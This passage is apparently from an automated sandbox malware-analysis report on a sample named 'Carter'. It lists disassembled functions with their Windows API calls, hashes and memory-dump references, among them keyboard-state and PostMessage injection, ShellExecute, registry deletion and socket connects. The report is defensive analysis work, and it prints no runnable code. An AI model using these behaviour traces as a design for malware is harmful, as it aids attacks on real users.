                                                                        • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0106BB4D
                                                                        • SendMessageW.USER32(011F5FB0,000000B0,?,?), ref: 0106BB84
                                                                        • IsDlgButtonChecked.USER32(?,?), ref: 0106BBC1
                                                                        • GetWindowLongW.USER32(011F5FB0,000000EC), ref: 0106BBE3
                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0106BBFB
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                        • String ID:
                                                                        • API String ID: 4072528602-0
                                                                        • Opcode ID: 2ad4f4de48787a714e74a038a758a973900fde824131264582f76f7730ccf8db
                                                                        • Instruction ID: d89b5ae636c14cc7f4ece2bf91dd3e4d3401280560ab5930479799a537f7110f
                                                                        • Opcode Fuzzy Hash: 2ad4f4de48787a714e74a038a758a973900fde824131264582f76f7730ccf8db
                                                                        • Instruction Fuzzy Hash: 12719CB4700205AFEB719E58C894FBE7BEDEF49311F144099EAC6D7295CB72A940CB60
                                                                        Function 0105FB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0105FB31
                                                                        • _memset.LIBCMT ref: 0105FBFA
                                                                        • ShellExecuteExW.SHELL32(?), ref: 0105FC3F
                                                                          • Part of subcall function 00FE4D37: __itow.LIBCMT ref: 00FE4D62
                                                                          • Part of subcall function 00FE4D37: __swprintf.LIBCMT ref: 00FE4DAC
                                                                          • Part of subcall function 00FF436A: _wcscpy.LIBCMT ref: 00FF438D
                                                                        • GetProcessId.KERNEL32(00000000), ref: 0105FCB6
                                                                        • CloseHandle.KERNEL32(00000000), ref: 0105FCE5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                        • String ID: @
                                                                        • API String ID: 3522835683-2766056989
                                                                        • Opcode ID: caf784799ef0e70b9de8dc108c76304c6e150fc53330e9f3d682a3368f4c42f4
                                                                        • Instruction ID: 2fb47744b53f3f009026e475cceb8ee86b3a1a9e9c57e5d98b2454950d323770
                                                                        • Opcode Fuzzy Hash: caf784799ef0e70b9de8dc108c76304c6e150fc53330e9f3d682a3368f4c42f4
                                                                        • Instruction Fuzzy Hash: D161D074A0061ADFDB11EF94C9909AEFBF5FF48310F148459E986AB351CB38AD41CB90
                                                                        Function 0104174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 0104178B
                                                                        • GetKeyboardState.USER32(?), ref: 010417A0
                                                                        • SetKeyboardState.USER32(?), ref: 01041801
                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 0104182F
                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0104184E
                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 01041894
                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 010418B7
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: c1fcfac6d05b0a8ee8c40f1f21e0a9d64f2575804bbf32dfe4d4692df851ee95
                                                                        • Instruction ID: e41766f2594b3a6df76d8dcd5bf3386a2918d209c6d1970a3a1181a15ddf12c8
                                                                        • Opcode Fuzzy Hash: c1fcfac6d05b0a8ee8c40f1f21e0a9d64f2575804bbf32dfe4d4692df851ee95
                                                                        • Instruction Fuzzy Hash: B951A3F0A087D53FFB7686288885BBA7EE96B06300F0C85EDE1D5558C2D2B9B8D4D750
                                                                        Function 01041565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetParent.USER32(00000000), ref: 010415A4
                                                                        • GetKeyboardState.USER32(?), ref: 010415B9
                                                                        • SetKeyboardState.USER32(?), ref: 0104161A
                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 01041646
                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 01041663
                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 010416A7
                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 010416C8
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                        • String ID:
                                                                        • API String ID: 87235514-0
                                                                        • Opcode ID: bac569c10b9e4f93b401f2c2f40828d742880d3208053972833b15269c756663
                                                                        • Instruction ID: 6719547d796e5ce11fd00630e0a0de42aaa072df1d72fc059a6e4417e061f389
                                                                        • Opcode Fuzzy Hash: bac569c10b9e4f93b401f2c2f40828d742880d3208053972833b15269c756663
                                                                        • Instruction Fuzzy Hash: BB51D4F0A047D57FFB3287288885BBA7EE96B0A200F0C45E9E1D5568C2D6B5F8D4D790
                                                                        Function 01045BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsncpy$LocalTime
                                                                        • String ID:
                                                                        • API String ID: 2945705084-0
                                                                        • Opcode ID: b6540ad9e23f146e76bc91565736b39176249d4650d1de7c7fa7a6860ba290d6
                                                                        • Instruction ID: d00723791195fdd79cf6f68d62cffd6772495d7daf9fd9db68d2f6b048f0135c
                                                                        • Opcode Fuzzy Hash: b6540ad9e23f146e76bc91565736b39176249d4650d1de7c7fa7a6860ba290d6
                                                                        • Instruction Fuzzy Hash: DE41E8A5C501197BDB22FBF4CC89ACFB7BCAF14310F514866EA89E3150E7349619C3A9
                                                                        Function 01043B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01044BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01043B8A,?), ref: 01044BE0
                                                                          • Part of subcall function 01044BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01043B8A,?), ref: 01044BF9
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 01043BAA
                                                                        • _wcscmp.LIBCMT ref: 01043BC6
                                                                        • MoveFileW.KERNEL32(?,?), ref: 01043BDE
                                                                        • _wcscat.LIBCMT ref: 01043C26
                                                                        • SHFileOperationW.SHELL32(?), ref: 01043C92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                        • String ID: \*.*
                                                                        • API String ID: 1377345388-1173974218
                                                                        • Opcode ID: 8ebdb4a1daaf892ea67267e8b32e6b69191b8a6f65a18a4e992c2e2e13c695e5
                                                                        • Instruction ID: 8acb0c17542510c1674b0534e7008c972ddcf0aba6d2b2716cae62c5d3cadb1d
                                                                        • Opcode Fuzzy Hash: 8ebdb4a1daaf892ea67267e8b32e6b69191b8a6f65a18a4e992c2e2e13c695e5
                                                                        • Instruction Fuzzy Hash: 35419DB140C345ABD762EB64C484ADFB7ECAF88240F50197EF5C9C7191EB34D2888752
                                                                        Function 010678B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 010678CF
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01067976
                                                                        • IsMenu.USER32(?), ref: 0106798E
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 010679D6
                                                                        • DrawMenuBar.USER32 ref: 010679E9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                                        • String ID: 0
                                                                        • API String ID: 3866635326-4108050209
                                                                        • Opcode ID: 58eb5989f25bf7093b95f5fd9c5fd5bbca6bccfbb668957567a27775b7bd2b6c
                                                                        • Instruction ID: a81572ef91b06da7b1f50787457e41b6da6c7cc0274a0b7555f508a1382bdef9
                                                                        • Opcode Fuzzy Hash: 58eb5989f25bf7093b95f5fd9c5fd5bbca6bccfbb668957567a27775b7bd2b6c
                                                                        • Instruction Fuzzy Hash: F4417C71A00209EFDB20DF68D884E9EBBF9FF05314F048269F995A7240D779A950CFA1
                                                                        Function 01061602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 01061631
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0106165B
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 01061712
                                                                          • Part of subcall function 01061602: RegCloseKey.ADVAPI32(?), ref: 01061678
                                                                          • Part of subcall function 01061602: FreeLibrary.KERNEL32(?), ref: 010616CA
                                                                          • Part of subcall function 01061602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 010616ED
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 010616B5
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                        • String ID:
                                                                        • API String ID: 395352322-0
                                                                        • Opcode ID: e65f9603cb9fbed317333fd234c95b3069d311dc8ba3a7a277a8beb6fdb78bba
                                                                        • Instruction ID: c8ce15c42147371e9c66fbf22c5cade65195beb49429cbbc4c92102b305c6211
                                                                        • Opcode Fuzzy Hash: e65f9603cb9fbed317333fd234c95b3069d311dc8ba3a7a277a8beb6fdb78bba
                                                                        • Instruction Fuzzy Hash: 99312DB5D00109BFEB55DF94D885EFEBBBCEF09311F0402A9F541E2140EA759E459BA0
                                                                        Function 010668F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 01066911
                                                                        • GetWindowLongW.USER32(011F5FB0,000000F0), ref: 01066944
                                                                        • GetWindowLongW.USER32(011F5FB0,000000F0), ref: 01066979
                                                                        • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 010669AB
                                                                        • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 010669D5
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 010669E6
                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 01066A00
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: LongWindow$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 2178440468-0
                                                                        • Opcode ID: 175a78387c1fb0d65d1b22d8c9eb1cfc8c32f28a9d84760278b67e329af4048c
                                                                        • Instruction ID: 18079ef16f530e46e5917640184077df00771c45763efb724651277b5e225daa
                                                                        • Opcode Fuzzy Hash: 175a78387c1fb0d65d1b22d8c9eb1cfc8c32f28a9d84760278b67e329af4048c
                                                                        • Instruction Fuzzy Hash: B4314D30640151AFDB31CF1DD894FA537E9FB4A714F1841A4F9959F2AACB77A840CBA0
                                                                        Function 0103E287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0103E2CA
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0103E2F0
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0103E2F3
                                                                        • SysAllocString.OLEAUT32(?), ref: 0103E311
                                                                        • SysFreeString.OLEAUT32(?), ref: 0103E31A
                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0103E33F
                                                                        • SysAllocString.OLEAUT32(?), ref: 0103E34D
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                        • String ID:
                                                                        • API String ID: 3761583154-0
                                                                        • Opcode ID: 2fe7bbf28c52fe4d52f50cd88809c1b1c019d64b52bc83293ea70dde2102b5a8
                                                                        • Instruction ID: 6ab51371e793df3496e5b4f716bcf78c54c888d0b8df87a46bf0304dde48be19
                                                                        • Opcode Fuzzy Hash: 2fe7bbf28c52fe4d52f50cd88809c1b1c019d64b52bc83293ea70dde2102b5a8
                                                                        • Instruction Fuzzy Hash: 4E21A976604219BF9F50DEA8DC88CBF77ECEF49260B048265F994DB294DA74DC418760
                                                                        Function 0105685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 01058475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 010584A0
                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 010568B1
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 010568C0
                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 010568F9
                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 01056902
                                                                        • WSAGetLastError.WSOCK32 ref: 0105690C
                                                                        • closesocket.WSOCK32(00000000), ref: 01056935
                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0105694E
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 910771015-0
                                                                        • Opcode ID: 27cfcda869a9701d848283c66f53f06ec654f7001b3b8330eb863c37e6ff7c67
                                                                        • Instruction ID: 5b30a0bfd90ac8b176c9e1f7bc8e0abacbe0a6bafd58289a772bfb3ae74f139f
                                                                        • Opcode Fuzzy Hash: 27cfcda869a9701d848283c66f53f06ec654f7001b3b8330eb863c37e6ff7c67
                                                                        • Instruction Fuzzy Hash: 6131C471600108AFDB609F64CC84BBE7BFDEF45725F048169FD85EB285CB75A8058BA1
                                                                        Function 0103E360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0103E3A5
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0103E3CB
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 0103E3CE
                                                                        • SysAllocString.OLEAUT32 ref: 0103E3EF
                                                                        • SysFreeString.OLEAUT32 ref: 0103E3F8
                                                                        • StringFromGUID2.OLE32(?,?,00000028), ref: 0103E412
                                                                        • SysAllocString.OLEAUT32(?), ref: 0103E420
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                        • String ID:
                                                                        • API String ID: 3761583154-0
                                                                        • Opcode ID: f1256f4d92b75a18d57728f38f5761b57be0703a7ef1b8dda4313e65e1fee461
                                                                        • Instruction ID: b5e0ae4b12d0f6d419fd4afa0df75d17ce1e5bc435ca5e94a0869cd2b4ef3227
                                                                        • Opcode Fuzzy Hash: f1256f4d92b75a18d57728f38f5761b57be0703a7ef1b8dda4313e65e1fee461
                                                                        • Instruction Fuzzy Hash: 7B21BB71604205AFEB509FACDC88DAF77ECEB4D360B008765FA84DB294DA74DC418760
                                                                        Function 01067BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FE214F
                                                                          • Part of subcall function 00FE2111: GetStockObject.GDI32(00000011), ref: 00FE2163
                                                                          • Part of subcall function 00FE2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FE216D
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01067C57
                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 01067C64
                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 01067C6F
                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01067C7E
                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01067C8A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                        • String ID: Msctls_Progress32
                                                                        • API String ID: 1025951953-3636473452
                                                                        • Opcode ID: 0f21662fe9c8a3889630ad75f6aea10dcccc942c60afdd7345009615dcf7ce05
                                                                        • Instruction ID: ebbbc12ddeaab1aec38f9ababe9e7bb9140148386cf77a5fe0dfeaabcc276a31
                                                                        • Opcode Fuzzy Hash: 0f21662fe9c8a3889630ad75f6aea10dcccc942c60afdd7345009615dcf7ce05
                                                                        • Instruction Fuzzy Hash: E411B2B224021DBEEF158E64CC85EEB7F5DEF087A8F014115BB48A6094C6769C21DBA0
                                                                        Function 010041B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,01004282,?), ref: 010041D3
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 010041DA
                                                                        • EncodePointer.KERNEL32(00000000), ref: 010041E6
                                                                        • DecodePointer.KERNEL32(00000001,01004282,?), ref: 01004203
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                        • String ID: RoInitialize$combase.dll
                                                                        • API String ID: 3489934621-340411864
                                                                        • Opcode ID: 6fb7b245473cfacc6118506ef508f72e668d20f33a7137081e0330b4b98d0ee3
